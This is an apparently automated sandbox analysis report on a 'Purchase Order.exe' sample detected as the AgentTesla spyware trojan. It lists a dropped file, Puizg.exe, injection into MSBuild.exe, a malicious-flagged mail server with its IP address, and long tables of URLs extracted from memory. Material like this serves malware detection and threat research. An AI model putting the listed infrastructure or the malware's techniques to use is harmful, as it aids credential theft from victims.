   started        signatures10 process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exe31%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SourceDetectionScannerLabelLinkDownload
                    17.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                    http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                    http://www.e-me.lv/repository00%URL Reputationsafe
                    http://DGeKzF.com0%Avira URL Cloudsafe
                    http://www.acabogacia.org/doc00%URL Reputationsafe
                    http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                    http://ocsp.suscerte.gob.ve00%URL Reputationsafe
                    http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
                    http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
                    http://www.chambersign.org10%URL Reputationsafe
                    http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                    http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
                    http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                    http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
                    http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                    http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                    http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
                    http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                    http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                    http://www.defence.gov.au/pki00%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sk.ee/cps/00%URL Reputationsafe
                    http://www.globaltrust.info0=0%Avira URL Cloudsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                    http://policy.camerfirma.com00%URL Reputationsafe
                    http://www.ssc.lt/cps030%URL Reputationsafe
                    http://ocsp.pki.gva.es00%URL Reputationsafe
                    http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
                    https://eD1SuZymOZStl.or0%Avira URL Cloudsafe
                    http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
                    http://cps.letsencrypt.org00%URL Reputationsafe
                    http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                    http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
                    http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
                    https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                    http://www.dnie.es/dpc00%URL Reputationsafe
                    http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
                    http://www.globaltrust.info00%URL Reputationsafe
                    http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
                    https://www.catcert.net/verarrel0%URL Reputationsafe
                    http://www.disig.sk/ca0f0%URL Reputationsafe
                    http://www.sk.ee/juur/crl/00%URL Reputationsafe
                    http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
                    http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                    http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
                    http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
                    http://www.quovadis.bm00%URL Reputationsafe
                    http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
                    http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
                    http://www.trustdst.com/certificates/policy/ACES-index.html00%URL Reputationsafe
                    http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
                    http://www.accv.es000%URL Reputationsafe
                    http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
                    http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                    http://ocsp.ncdc.gov.sa00%URL Reputationsafe
                    http://mail.pilotgarage.com0%Avira URL Cloudsafe
                    http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
                    http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
                    http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cdn.discordapp.com
                    162.159.129.233
                    truefalse
                      high
                      mail.pilotgarage.com
                      5.250.241.50
                      truetrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.certplus.com/CRL/class3.crl0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.e-me.lv/repository0MSBuild.exe, 00000011.00000003.398047213.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://DGeKzF.comMSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.acabogacia.org/doc0MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.chambersign.org/chambersroot.crl0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ocsp.suscerte.gob.ve0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.postsignum.cz/crl/psrootqca2.crl02MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.dhimyotis.com/certignarootca.crl0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.chambersign.org1MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.pkioverheid.nl/policies/root-policy0MSBuild.exe, 00000011.00000003.398032121.0000000006466000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398159493.0000000006466000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://repository.swisssign.com/0MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.suscerte.gob.ve/lcr0#MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://crl.ssc.lt/root-c/cacrl.crl0MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://postsignum.ttc.cz/crl/psrootqca2.crl0MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlMSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ca.disig.sk/ca/crl/ca_disig.crl0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.certplus.com/CRL/class3P.crl0MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cThePurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.suscerte.gob.ve/dpc0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.certeurope.fr/reference/root2.crl0MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.certplus.com/CRL/class2.crl0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.disig.sk/ca/crl/ca_disig.crl0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.defence.gov.au/pki0MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleasePurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sk.ee/cps/0MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.globaltrust.info0=MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.anf.esMSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.urwpp.deDPleasePurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase Order.exe, 00000000.00000002.371704662.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.507585311.0000000003231000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.507971683.0000000002681000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://pki.registradores.org/normativa/index.htm0MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://cps.root-x1.letsencrypt.org0MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://policy.camerfirma.com0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.ssc.lt/cps03MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://ocsp.pki.gva.es0MSBuild.exe, 00000011.00000003.399208416.0000000006D28000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.anf.es/es/address-direccion.htmlMSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.anf.es/address/)1(0&MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://eD1SuZymOZStl.orMSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://stackoverflow.com/q/14436606/23354Purchase Order.exe, 00000000.00000002.371780538.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.508311794.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.508643864.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://ca.mtin.es/mtin/ocsp0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://cps.letsencrypt.org0MSBuild.exe, 00000011.00000002.513485610.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.509801704.0000000003357000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://crl.ssc.lt/root-b/cacrl.crl0MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://web.ncdc.gov.sa/crl/nrcacomb1.crl0MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.certicamara.com/dpc/0ZMSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0GMSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://crl.pki.wellsfargo.com/wsprca.crl0MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://wwww.certigna.fr/autorites/0mMSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.dnie.es/dpc0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwMSBuild.exe, 00000011.00000002.508094226.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ca.mtin.es/mtin/DPCyPoliticas0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.anf.es/AC/ANFServerCA.crl0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.globaltrust.info0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://certificates.starfieldtech.com/repository/1604MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://acedicom.edicomgroup.com/doc0MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.certplus.com/CRL/class3TS.crl0MSBuild.exe, 00000011.00000003.399506680.00000000064AA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://crl.anf.es/AC/ANFServerCA.crl0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.carterandcone.comlPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.certeurope.fr/reference/pc-root2.pdf0MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ac.economia.gob.mx/last.crl0GMSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlPurchase Order.exe, 00000000.00000002.373822257.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.catcert.net/verarrelMSBuild.exe, 00000011.00000003.397864043.000000000647A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.disig.sk/ca0fMSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.e-szigno.hu/RootCA.crlMSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://stackoverflow.com/q/2152978/23354rCannotPurchase Order.exe, 00000000.00000002.371780538.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000014.00000002.508311794.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.508643864.0000000002755000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sk.ee/juur/crl/0MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://crl.chambersign.org/chambersignroot.crl0MSBuild.exe, 00000011.00000003.397824150.000000000646C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://crl.xrampsecurity.com/XGCA.crl0MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398883491.0000000006D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://certs.oati.net/repository/OATICA2.crl0MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://crl.oces.trust2408.com/oces.crl0MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.514404668.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.quovadis.bm0MSBuild.exe, 00000011.00000003.399413894.0000000006D45000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398694540.0000000006D42000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398338255.0000000006D3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://eca.hinet.net/repository0MSBuild.exe, 00000011.00000003.398325450.0000000006D3B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.ssc.lt/root-a/cacrl.crl0MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://certs.oaticerts.com/repository/OATICA2.crlMSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.trustdst.com/certificates/policy/ACES-index.html0MSBuild.exe, 00000011.00000003.398014139.0000000006461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://certs.oati.net/repository/OATICA2.crt0MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.accv.es00MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.pkioverheid.nl/policies/root-policy-G20MSBuild.exe, 00000011.00000003.398106072.0000000006454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0MSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.e-trust.be/CPS/QNcertsMSBuild.exe, 00000011.00000003.398206126.0000000006449000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399053031.0000000006D22000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398047213.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397677340.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://ocsp.ncdc.gov.sa0MSBuild.exe, 00000011.00000003.399451261.0000000006D38000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.399030833.0000000006D35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.398231155.0000000006D2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
